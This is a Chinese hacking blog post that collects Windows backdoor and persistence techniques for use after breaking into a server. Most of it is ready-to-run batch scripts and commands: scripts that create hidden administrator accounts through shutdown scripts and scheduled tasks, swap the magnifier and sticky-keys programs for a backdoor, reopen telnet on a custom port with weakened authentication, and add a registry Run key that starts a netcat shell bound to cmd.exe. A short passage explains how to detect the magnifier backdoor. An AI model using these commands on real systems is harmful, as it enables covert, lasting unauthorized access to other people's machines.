陌安'BLOG--专注安全

事了拂衣去，深藏名与利

Winows后门及代码总汇（提权及服务器维护必学）

组策略欺骗后门

创建一个批处理文件add.bat，内容是：

@echo off

net user hack$ test168 /add

net localgroup administrators hack$ /add

exit

(2)利用

　　上传运行gpedit.msc，定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”，在其中添加add.bat。

　　这样就实现了当系统关机时创建hack$用户，及时被删了，关机时又会再次创建。

　　还可以实现开机时添加账户，关机时删除账户等等。可以把bat转换成exe，上传到目标机器，伪装成系统程序等等。

放大镜程序后门

思路：伪造替换 magnify.exe

(1) 构造批处理脚本：magnify.bat

@echo off

net user hack$ test168 /add

net localgroup administrators hack$ /add

%Windir%\system32\nagnify.exe

exit

@作用：先创建管理员用户，在运行原来的放大镜程序

(2)文件格式转换

利用bat2com / com2exe，BatToEXE(图形化工具)等工具把Bat文件转换成exe文件，如：

bat2com magnify.bat 　　将magnify.bat转换成magnify.com
com2exe magnify.com 　　将magnify.com转换成magnify.exe

(3)利用批处理自动替换

@echo off

copy %Windir%\system32\dllcache\magnify.exe nagnify.exe 　　将放大镜程序备份为nagnify.exe

copy %Windir%\system32\magnify.exe nagnify.exe

replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache 替换放大镜程序

replace.exe %Windir%\magnify.exe %Windir%\system32

exit

@(4)使用：登陆时通过组合键 Win+U 调用

(5) 防范措施
　　进入%Windir%\system32\查看magnify.exe的文件图标是否是原来的放大镜的图标，如果不是的话极有可能被植入了放大镜后门。

　　当然，有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间，如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe，然后运行查看是否有可疑的用户。

　　如果确定服务器被放置了放大镜后门，首先要删除该文件，然后恢复正常的放大镜程序。当然，我们也可以做得更彻底一些，用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身，构造一个magnify.exe，通过其警告攻击者或者进行入侵监控和取证。
　　补充：与放大镜后门类似的还有“粘滞键”后门，即按下SHIEF键五次可以启动粘滞键功能，其利用和防范措施与放大镜后门类似，只是将magnify.exe换成了sethc.exe。

telnet后门

tlntadmn config port=2233 //修改 telnet默认端口
sc config tlntsvr start= auto
net start telnet

一个批处理,可以根据需要修改。转换成exe等等，思路很多。。。

@echo off

sc config tlntsvr start= auto

@net start telnet

@tlntadmn config sec =passwd

@tlntadmn config port = 2233

@net user hack& 123456789 /add

@net localgroup administrators hack$ /add

@pause

@md c:\windows\ShareFolder

@net share MyShare=c:\windows\ShareFolder

msf权限维持模块：exploit/windows/local/registry_persistence

可以修改注册表，增加后门自启动代码.

reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t

REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

循环不断地建立账户
    @echo off
    @attrib +s + r xyt.bat
    @net user moan /del
    @net user moan 000000 /add
    @net localgroup administrators hack95$ /add
    @tlntadmn config sec = -ntlm

    @net stop schedule
    @net start Schedule
    @echo at 11:00 c:/WINNT/SYSTEM32/log.bat > c:/WINNT/SYSTEM32/xyt.bat
    @echo at 23:00 c:/WINNT/SYSTEM32/log.bat >> c:/WINNT/SYSTEM32/xyt.bat
    @at 11:05 c:/WINNT/SYSTEM32/xyt.bat
    @at 23:05 c:/WINNT/SYSTEM32/xyt.bat
    @net stop telnet
    @net start telnet
    @exit

这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，嘿嘿
运行后TELNET IP上去，用户名为moan，密码为000000

时间　2017/08/26 热度　5

#黑客 #陌安 #热门 #入侵 #渗透 #hacker #网络安全

热度(5)